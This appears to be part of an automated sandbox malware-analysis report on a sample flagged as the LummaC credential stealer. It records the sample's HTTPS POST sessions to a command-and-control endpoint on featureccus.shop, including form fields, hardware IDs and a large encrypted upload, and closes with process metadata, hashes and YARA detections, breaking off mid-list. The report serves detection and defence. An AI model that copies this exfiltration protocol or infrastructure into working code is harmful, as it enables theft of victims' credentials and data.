2025-03-10 20:03:10 UTC	15331	OUT	Data Raw: 2d 2d 4b 34 39 39 46 47 4e 73 48 37 4a 44 51 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 31 36 61 33 63 62 39 30 34 37 32 35 36 38 35 30 61 35 31 61 35 65 61 62 63 31 35 65 65 34 30 31 30 31 32 31 37 30 66 32 33 32 63 64 31 31 64 32 63 37 39 0d 0a 2d 2d 4b 34 39 39 46 47 4e 73 48 37 4a 44 51 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 34 39 39 46 47 4e 73 48 37 4a 44 51 52 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 Data Ascii: --K499FGNsH7JDQRSContent-Disposition: form-data; name="uid"c16a3cb9047256850a51a5eabc15ee401012170f232cd11d2c79--K499FGNsH7JDQRSContent-Disposition: form-data; name="pid"3--K499FGNsH7JDQRSContent-Disposition: form-data; name="hwid"F7
2025-03-10 20:03:10 UTC	4621	OUT	Data Raw: 12 3b 23 e7 f7 d8 4e 3f dc da 73 81 32 5a 70 ef 11 17 7c 52 51 43 7b 43 46 2a a0 fe f3 cd 12 89 2f 3a 75 7f 0b 58 cf 26 0e 5c 9c 28 07 d3 60 8c 76 29 58 5c 83 b6 56 01 e1 70 e6 6e 8d 44 46 16 c0 56 49 cb 2b a4 3b f8 41 23 ac b8 13 f4 f2 3f ab 35 f9 d8 4f 16 2b 82 7e e6 68 05 b0 87 00 ef f8 b7 f5 1e 24 15 3a 3c 86 1c aa 49 6f 5a 75 33 99 59 a9 3a 04 88 1d 8f 99 2f 5d d8 53 50 58 ba e7 e1 bd bd 0f a9 6d ca 05 90 57 2b c3 8d 16 4f 19 f7 b8 32 e1 c3 5f e6 53 c0 6b d7 25 c6 35 6c 20 de d2 90 31 9a c8 8d 4e 0b 8f ba b3 23 e7 ee 17 5f 52 41 26 c5 68 51 ef 6e 21 fa a6 6e ea 44 4b 3b 4e aa 01 90 e9 65 25 05 6e ab f8 44 bb 04 07 e7 85 3f 04 0e c1 eb 70 53 26 af a0 cf f2 29 5a cd 71 24 5c fa 55 6e e1 15 09 06 75 94 40 33 5a 2c 12 5e e7 b4 68 68 5d 1d 66 c1 cd c5 9e Data Ascii: ;#N?s2Zp\|RQC{CF*/:uX&\(`v)X\VpnDFVI+;A#?5O+~h$:<IoZu3Y:/]SPXmW+O2_Sk%5l 1N#_RA&hQn!nDK;Ne%nD?pS&)Zq$\Unu@3Z,^hh]f
2025-03-10 20:03:11 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:03:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JvREfvy8Le4oelpYhhE1%2FgEVLuxjNjy6YCIaD3SV5xxNNfXYVfN1ca6v%2BzGS2ml2zDrNDS2yAMnQoYtP80bNMRDIaYlXcBkGr5LGxmfhSf%2BC6OjPBNP7qZgrCuhsZZ4J2Cp2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e569f68c8912ce-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11378&min_rtt=5312&rtt_var=11995&sent=14&recv=25&lost=0&retrans=1&sent_bytes=4228&recv_bytes=20913&delivery_rate=92150&cwnd=224&unsent_bytes=0&cid=79598ea7f81a8164&ts=1349&x=0"
2025-03-10 20:03:11 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49698	172.67.204.104	443	6420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:03:13 UTC	284	OUT	POST /bdMAn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=zRsUd1Wtfm4eo5rPrs2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2333 Host: featureccus.shop
2025-03-10 20:03:13 UTC	2333	OUT	Data Raw: 2d 2d 7a 52 73 55 64 31 57 74 66 6d 34 65 6f 35 72 50 72 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 31 36 61 33 63 62 39 30 34 37 32 35 36 38 35 30 61 35 31 61 35 65 61 62 63 31 35 65 65 34 30 31 30 31 32 31 37 30 66 32 33 32 63 64 31 31 64 32 63 37 39 0d 0a 2d 2d 7a 52 73 55 64 31 57 74 66 6d 34 65 6f 35 72 50 72 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 7a 52 73 55 64 31 57 74 66 6d 34 65 6f 35 72 50 72 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d Data Ascii: --zRsUd1Wtfm4eo5rPrs2Content-Disposition: form-data; name="uid"c16a3cb9047256850a51a5eabc15ee401012170f232cd11d2c79--zRsUd1Wtfm4eo5rPrs2Content-Disposition: form-data; name="pid"1--zRsUd1Wtfm4eo5rPrs2Content-Disposition: form-data; name=
2025-03-10 20:03:14 UTC	811	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXYHhsO0UqTNFQ8iJqc%2BdFN4VQbDuYwpOYux2WmtxMGD5OmeanTznaoQKHrQy0X%2FBJm0ifUTPMiFV%2FLanQ4AbrtzmJy7PL23ssVICTFgrJ5RPExdmh7Hn1s22DmFfSXMTfD0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56a0bdc0c4d20-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13494&min_rtt=7470&rtt_var=12531&sent=7&recv=10&lost=0&retrans=1&sent_bytes=4228&recv_bytes=3253&delivery_rate=86742&cwnd=222&unsent_bytes=0&cid=a14b5e92e1cdbfb4&ts=981&x=0"
2025-03-10 20:03:14 UTC	74	IN	Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}
2025-03-10 20:03:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49700	172.67.204.104	443	6420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:03:17 UTC	283	OUT	POST /bdMAn HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FL5I7kL4TdpZ472H User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569918 Host: featureccus.shop
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: 2d 2d 46 4c 35 49 37 6b 4c 34 54 64 70 5a 34 37 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 63 31 36 61 33 63 62 39 30 34 37 32 35 36 38 35 30 61 35 31 61 35 65 61 62 63 31 35 65 65 34 30 31 30 31 32 31 37 30 66 32 33 32 63 64 31 31 64 32 63 37 39 0d 0a 2d 2d 46 4c 35 49 37 6b 4c 34 54 64 70 5a 34 37 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 4c 35 49 37 6b 4c 34 54 64 70 5a 34 37 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d Data Ascii: --FL5I7kL4TdpZ472HContent-Disposition: form-data; name="uid"c16a3cb9047256850a51a5eabc15ee401012170f232cd11d2c79--FL5I7kL4TdpZ472HContent-Disposition: form-data; name="pid"1--FL5I7kL4TdpZ472HContent-Disposition: form-data; name="hwid"
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: 7e ca 40 2f 03 72 49 28 d3 25 6a c3 bd 6d ff 01 b3 38 b8 e7 ea 7e df 1e 94 1d de bc 76 23 fe ef b6 70 ff 64 cc 3d d3 fc 3e 95 8b c5 a9 9d c8 f2 50 d8 64 21 79 9d 0c 63 0a 0c 44 7b 3d 3f ba 8c a3 c4 d0 76 ca 8d 87 c1 e9 5a 85 4a d7 66 c7 5b e0 43 d2 9a ce ef 7a d7 99 28 63 77 d7 bc 96 2a e8 61 74 cd 98 d8 51 26 b1 93 db 88 64 ef 88 30 eb 04 a0 56 ac d6 77 f8 c5 a5 61 b3 95 fe 03 a0 40 f2 89 7a cb e1 a9 a3 1a c9 69 a1 81 bf 98 19 a6 65 8f d6 41 24 b7 97 76 8a dc 09 4e e8 73 10 94 6c 18 d9 43 0d b6 1a 36 9f 32 ae 98 69 bc 8b e5 fd ff 4a 0c e7 7a b9 1e b3 5e f9 59 79 9a dc 48 3c d2 a2 7d c2 30 51 dc 13 46 49 97 4c 53 53 ca 5f a5 74 a1 c0 16 24 db 69 21 ee 60 29 7e 07 1b 55 a5 8c 41 e2 b7 da 3a 3f ff ec 9d e5 a6 eb 99 e5 45 05 fe 91 47 f2 9a 3f b2 11 10 60 12 Data Ascii: ~@/rI(%jm8~v#pd=>Pd!ycD{=?vZJf[Cz(cw*atQ&d0Vwa@zieA$vNslC62iJz^YyH<}0QFILSS_t$i!`)~UA:?EG?`
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: 37 b1 7c de 46 dc 25 e9 44 6c b6 c4 bb 1e 85 ae 4e b2 17 36 18 f1 07 58 87 5f 71 6c db 25 56 2c 37 eb 88 2f 4a 09 e7 62 ff 57 11 d0 58 55 98 14 be 20 4e a9 a6 0b 64 c9 fa fb bb 2a 07 a7 bc 2a f2 9a e1 d4 93 a2 12 54 64 08 d0 34 11 b2 31 3e ca 97 8b 57 25 8b ce fd 7d c3 d7 b9 45 7e 62 35 1f c7 51 f9 69 a0 30 19 0b de e3 3f 8c d4 b1 f7 4c 40 81 11 ff 0a 25 82 9c 37 dc d0 d4 ab 4c 7c b0 83 84 1a 52 82 f4 9f a5 ff 33 1b 4b 94 fc ad 91 1e 71 fa f5 d9 27 15 f4 32 4c 68 b4 08 6a 5b 21 5d e6 15 69 ba 27 ac f7 c5 fd b0 f1 50 80 88 f6 88 2a a9 42 ab 7f da 6c b0 e2 d6 c1 47 7f ab 31 7e b4 96 00 df a2 e0 87 85 2f 25 b0 c9 e6 ef 70 1e b8 8a 05 8f 7b 91 31 43 bf 6d ed 93 bd 56 0d 48 86 75 95 b6 3c dc ff 24 31 7a af 32 13 34 b3 18 5f 32 f6 8f f9 36 75 57 e8 b1 66 01 e1 Data Ascii: 7\|F%DlN6X_ql%V,7/JbWXU Nd*Td41>W%}E~b5Qi0?L@%7L\|R3Kq'2Lhj[!]i'PBlG1~/%p{1CmVHu<$1z24_26uWf
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: cd 72 fc 6b dc 7c 4b 70 96 38 16 c9 85 b4 86 1c fe 11 2d f2 68 9e 39 14 d1 63 77 ab 83 67 22 db 76 61 3c 39 89 a5 2a df 41 7a f6 c4 e8 2a 34 56 e3 ff f5 4a 1f f7 bc 73 24 27 90 2f bf d2 ef a0 22 0f 8b ec fe db d2 1f 1f 90 7a 7a ed 2b 83 fd bb 05 02 de 25 ca 18 c5 6b 3d 95 3c 28 40 02 82 e3 87 59 7e 9c 6e c4 51 b1 66 d3 6e a7 a1 ec 59 ee 39 49 0a ee d0 ec 77 7c 54 89 a3 d9 22 86 b6 33 dd 62 2a 88 63 c2 68 d9 d9 a1 0c 30 67 2c cf 20 7c 53 69 8e 68 50 3a c7 15 88 7b 60 0a c3 97 40 af 9d 90 d8 f2 b6 c3 d7 fe c0 78 6e 9a 5a 64 ac 97 d2 68 f5 c4 d0 4a b2 9b 59 01 c6 f9 b9 1d b3 c0 2e c4 60 c1 af 07 df a3 5d e3 30 2b a4 9e 39 5f a1 82 2f f0 e6 48 3b 74 b4 fb 4a 7c bb 7c 49 a2 43 88 8c 59 ed f8 63 e1 53 2a 0a c9 85 c8 79 4f 48 d4 81 86 5c 35 ee e8 68 0d 68 d0 73 Data Ascii: rk\|Kp8-h9cwg"va<9Az4VJs$'/"zz+%k=<(@Y~nQfnY9Iw\|T"3bch0g, \|SihP:{`@xnZdhJY.`]0+9_/H;tJ\|\|ICYcSyOH\5hhs
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: 58 8c 6a f7 77 f9 c1 6c 79 69 1a c5 5c fa 37 11 8c 7b 98 59 d4 b0 38 0c 3b f4 46 0d a2 4c d2 c0 f3 39 18 06 12 75 41 c6 dc aa fe b5 1c 81 19 59 3b 90 08 e9 16 bf 16 54 ed bd e7 f2 81 f5 48 d6 b9 bd 3f d2 c2 92 ae c6 63 f7 44 72 4a f4 24 cf b3 82 41 76 9b b5 26 c1 c4 cf 63 4a 99 45 74 36 63 c0 88 88 6e 0a fc c4 87 83 20 55 c5 c0 02 79 95 6a 46 18 23 10 24 0f 15 84 2b 28 37 b1 b2 69 73 95 dc 1d 5c bf 98 c2 78 c7 b6 7c 06 91 4a 38 11 5b fa ff 02 b8 29 8b 1e e8 9d e9 df 4b ee 23 2e 33 82 d5 0d 8a e6 22 73 2c 47 1b 5d e6 08 9b 3b 50 19 6e a1 bb e9 47 a3 ca 53 8f 14 d7 21 3a 83 e1 c8 40 5c ee fe 68 fd 45 86 29 f4 d8 19 4d 92 3c 3e ef 7f cf 94 92 6d b0 80 14 b8 07 e4 bf 4f 99 ba 41 a6 8e 52 5f cd 57 46 9a 2a 97 d2 15 7d c9 89 fa 21 40 c0 07 67 bd 1f cc 5c 60 f2 Data Ascii: Xjwlyi\7{Y8;FL9uAY;TH?cDrJ$Av&cJEt6cn UyjF#$+(7is\x\|J8[)K#.3"s,G];PnGS!:@\hE)M<>mOAR_WF*}!@g\`
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: 64 18 82 e8 db fd eb 5a 98 66 71 7b 17 86 b0 31 95 4c 9e dc 01 22 6e f4 db 9d 73 61 0f 66 9d bf 8e a3 75 93 d5 7e 99 73 f3 2c 2b 00 ba a3 43 c5 c9 6b b2 68 77 e5 ec c6 a9 73 91 fe 4c 02 3e a6 34 1b 0c 25 19 4d 33 3d 56 30 92 4c 36 64 d4 58 8a 1c b4 10 d3 6b fa 55 e5 7d a1 b0 2f 2c 51 71 27 b2 9b 89 25 27 8e 9c be 64 d0 be 37 fd a1 6d 9f 20 de f6 c3 41 28 e7 32 ad c6 4f 2a a8 fe 1b fc 7e 24 47 c6 ed 3e 22 8a 60 cb 35 93 f1 e1 1d 6f b2 10 41 cb 31 5a 0e 88 e3 ba 39 fb 8a 09 d5 59 5e 1a 21 9e 65 61 2a 05 bb 25 10 37 b4 69 2a 3d 21 35 d4 79 f5 81 24 5d 3c b2 c5 6a fc 04 55 57 be be 0b a3 ec 2a e6 46 ac 02 ed 35 53 c7 5a 67 d9 2e 1d ed 46 86 a8 c5 de c5 9e 42 85 fd 39 48 c0 e7 d4 77 0f 1e 4c 61 f3 9e c4 a4 1a 08 eb 05 40 71 7e 2e 4a e2 e5 13 3c 09 cb e6 ff 2d Data Ascii: dZfq{1L"nsafu~s,+CkhwsL>4%M3=V0L6dXkU}/,Qq'%'d7m A(2O~$G>"`5oA1Z9Y^!ea%7i=!5y$]<jUWF5SZg.FB9HwLa@q~.J<-
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: 60 8a 4c 53 f7 c9 29 13 86 80 7c 7a 92 3d e5 32 f8 e6 1d 55 9c e1 45 c4 3d 36 0f 37 49 b9 09 07 4d be 8c 99 bd fa 70 21 08 b8 c9 87 f8 43 78 b4 16 5f 58 23 18 dc 07 22 2e eb c5 e2 7e 6f 29 f8 ea 07 04 2e 60 9f c9 c0 ed 98 7c b6 c3 80 d5 6d 82 49 07 ea 33 0d 0e d4 09 4a f8 f9 49 39 bb 5d b9 87 73 e4 1c 72 14 04 e1 b2 c7 5f 7d 6b 20 d9 23 a8 7a ea 24 df f1 af 23 fd c3 94 e9 57 4d 33 ee 3d 1d 0b 89 ac 6a 2e cb cc c9 9f 1e e2 c1 f6 44 8b 44 ea 12 d7 18 54 0e 1a 63 58 1a 15 26 bc 15 78 3b c8 82 4c 0a d9 2f 2d 65 88 fe 6e 23 4f 03 22 59 53 1e 76 c9 d9 e4 bc a6 22 a4 2e b1 7e 9b 2f f9 7e a3 2d 7e 44 b3 af 72 59 3c 07 ba 10 27 78 95 86 29 bc f7 c2 58 51 b7 16 86 5a 84 87 6e 70 4b 05 21 f5 63 16 b3 0b e0 c5 83 4d 56 0e ab 0d 3e 43 3d 26 2d e0 0d aa f0 2e dd 81 17 Data Ascii: `LS)\|z=2UE=67IMp!Cx_X#".~o).`\|mI3JI9]sr_}k #z$#WM3=j.DDTcX&x;L/-en#O"YSv".~/~-~DrY<'x)XQZnpK!cMV>C=&-.
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: e9 2f ba d8 7f 35 57 b5 c4 35 d3 b6 0f 75 96 b9 0b 16 9c 42 fc 66 b8 6f 1d 9b e7 be 4e a6 6e f9 24 4f 82 17 26 95 c3 0b 6f c7 b2 6b 42 39 a7 db 14 22 94 8a 47 98 b8 dd 1c ed ac 53 7d 61 da 95 cb af 20 67 0f 7b ca 36 cf 49 30 4c e2 fe 60 93 f4 8a 0a 54 1f 15 d0 b6 2d d1 57 6e de e1 83 c5 d7 fa 36 40 10 27 17 46 1c 57 6b b8 b6 31 88 a0 05 d7 59 d4 da 41 83 8c f7 52 0c 73 dc 09 8d ad 7b 4d 8e 82 c3 1a 26 71 00 84 a1 e8 fd 2d cd 51 ca f9 1a f3 04 01 11 17 18 79 29 98 9f 4d 7b 48 2d 8a b2 47 2d bd 5b 99 b2 e6 34 92 d4 0f c7 3e eb a1 5f 5a 3f 7d 19 19 08 63 fb 21 a9 21 3f 70 db e6 bd 6a 73 79 21 56 35 86 20 aa 0b a3 ce 71 14 07 84 48 1d dc 99 40 4d 1c f2 9a 5e 6e d1 3b 97 fc 2a 67 59 3b c2 fa 02 46 f5 62 a2 42 3b b0 09 0f ca 42 8e 18 db 31 f4 4e 50 12 ce 3d f4 Data Ascii: /5W5uBfoNn$O&okB9"GS}a g{6I0L`T-Wn6@'FWk1YARs{M&q-Qy)M{H-G-[4>_Z?}c!!?pjsy!V5 qH@M^n;*gY;FbB;B1NP=
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: 69 83 f1 c0 02 09 20 de 7d aa 69 f5 5c d3 5b 4f df 66 12 b7 19 d2 ea 04 97 e9 c7 82 f8 aa a1 c0 51 dd bd 80 e7 0d fb a5 28 16 f0 bd 6d 7f 15 7c ad a7 d2 6c 05 56 5b 9c a4 8b 25 82 ef 99 71 8a 4d 77 4b 26 3d 9d ad fc f0 27 25 c2 49 08 39 27 24 97 67 7b d7 5d ce 9f 90 70 1b 29 ca d4 b4 f5 1f ea 53 e4 ac 6b d3 a9 ce 1e ca ae 7a 7e 0b 7a a3 a2 54 67 15 66 57 bd 34 25 32 66 6f 55 d5 1d 23 b7 a9 7c 90 55 ae a4 52 0f 76 79 ac 82 a7 1b 78 ae 80 2f 84 34 30 27 28 ba 06 3b 99 c1 70 22 60 c1 80 2b 55 cb 5a c6 79 9a 6d 37 9c 34 6d 47 91 9f c5 e1 88 8f 74 5e 59 0f ae ed 99 41 e6 9c 7b 1c 1c f8 ba 78 85 52 bb 39 38 7c 2d e6 b7 36 c6 58 c9 bf 79 ea ce 24 97 97 09 7b c5 7a ae b0 10 96 82 89 b9 75 fd df f5 ef a1 d7 c9 b1 01 42 4a ec ba aa e4 3a 7b 71 35 7d 7d 47 4b b2 a4 Data Ascii: i }i\[OfQ(m\|lV[%qMwK&='%I9'$g{]p)Skz~zTgfW4%2foU#\|URvyx/40'(;p"`+UZym74mGt^YA{xR98\|-6Xy${zuBJ:{q5}}GK
2025-03-10 20:03:17 UTC	15331	OUT	Data Raw: d3 ea fb 30 03 79 0f 46 fa 73 f1 87 57 87 a5 70 5d 6b fe 8a de 30 d1 94 03 ae d5 98 44 23 32 22 ad 14 ef 19 69 d5 68 74 ff 38 63 0b 45 01 60 eb e9 56 28 ef 01 0b 55 bb ea d2 44 1f 1c d5 3a dd 0f 1e 04 d3 c5 1f 7c eb 13 71 76 5c 76 fc 08 c1 e7 5f 71 04 6b 1d 2e 0a 71 ba 4e 80 be c2 4c a1 ca 3e ec c4 5b 55 36 3c d8 d0 0f c2 da 9f a7 a1 c4 c7 df f3 9f e4 9a 7d cc c8 f7 bb 93 87 68 37 39 07 c8 84 df a1 c0 3e 32 3d af ef 55 4c f0 45 5c a4 33 14 31 16 a0 d8 8f cb 3b e1 a4 b8 51 39 13 60 1c 41 0a 40 f6 13 4a d8 e2 dc 2c cf 23 2a 43 c8 44 49 98 24 85 71 f2 60 c4 da b0 97 3f 5c e9 22 40 c8 3e 7e 83 06 d5 3c 66 6f 23 66 a5 b9 90 54 64 9f e2 1f a5 b9 f8 ba f7 b4 bf c9 0c 18 92 bc fe 29 67 89 90 ca 60 c8 5d 59 4d f5 c8 c3 ae 7c 50 9b 68 b0 b3 88 20 59 ff f8 e4 37 56 Data Ascii: 0yFsWp]k0D#2"iht8cE`V(UD:\|qv\v_qk.qNL>[U6<}h79>2=ULE\31;Q9`A@J,#*CDI$q`?\"@>~<fo#fTd)g`]YM\|Ph Y7V
2025-03-10 20:03:19 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:03:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GxPoJLLTXqX8ZhG7y2mVh764cCCk6ACU14jhop2a%2BVHWb1OnLaIvwcCh5WS0jNUljK6otqZHlYlwxxD18XUSSAzFG6nKeHEYHIiK8QtM2N7tHAJDP%2Bep9uF621o%2F83bYjBOz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56a222cf4c979-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4778&min_rtt=4034&rtt_var=1800&sent=300&recv=456&lost=0&retrans=0&sent_bytes=2837&recv_bytes=572465&delivery_rate=716831&cwnd=249&unsent_bytes=0&cid=2cc877c7da61e90e&ts=2239&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49702	172.67.204.104	443	6420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-10 20:03:21 UTC	266	OUT	POST /bdMAn HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 99 Host: featureccus.shop
2025-03-10 20:03:21 UTC	99	OUT	Data Raw: 75 69 64 3d 63 31 36 61 33 63 62 39 30 34 37 32 35 36 38 35 30 61 35 31 61 35 65 61 62 63 31 35 65 65 34 30 31 30 31 32 31 37 30 66 32 33 32 63 64 31 31 64 32 63 37 39 26 63 69 64 3d 26 68 77 69 64 3d 46 37 32 45 39 34 39 37 37 31 32 42 30 32 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34 Data Ascii: uid=c16a3cb9047256850a51a5eabc15ee401012170f232cd11d2c79&cid=&hwid=F72E9497712B0267E3EDCEA778368E34
2025-03-10 20:03:21 UTC	782	IN	HTTP/1.1 200 OK Date: Mon, 10 Mar 2025 20:03:21 GMT Content-Type: application/octet-stream Content-Length: 43 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHC8CopzdBRD6jOOXBJgJryA347Fq1d4TZTCOABxau9HKlQPq%2FphnBiBLowcVUxleRQAoMZhFiGdrOJanoShwdX%2Byf%2BoaCAYCjfhFshTDwaZq8KlRGMmYeMGNY%2FGX2dujc8K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91e56a3a6ba222ef-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28737&min_rtt=3583&rtt_var=18845&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1001&delivery_rate=599834&cwnd=246&unsent_bytes=0&cid=d06c335387f5fd9d&ts=878&x=0"
2025-03-10 20:03:21 UTC	43	IN	Data Raw: 57 07 bd 10 c6 b1 65 15 84 cb 0f d8 e6 26 5f 9e e7 63 2a 64 cc 9a 35 79 ae 1f 0f fc 3f c7 57 e6 2c d7 8b 82 2c 6e f8 48 db 47 f9 Data Ascii: We&_c*d5y?W,,nHG

Target ID:	0
Start time:	16:02:57
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa50000
File size:	1'000'448 bytes
MD5 hash:	3D27865E186DE4D99D25418E0C0789FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1270512727.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:02:57
Start date:	10/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:02:58
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa50000
File size:	1'000'448 bytes
MD5 hash:	3D27865E186DE4D99D25418E0C0789FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1398662498.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1398933075.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1398662498.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1398740502.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: 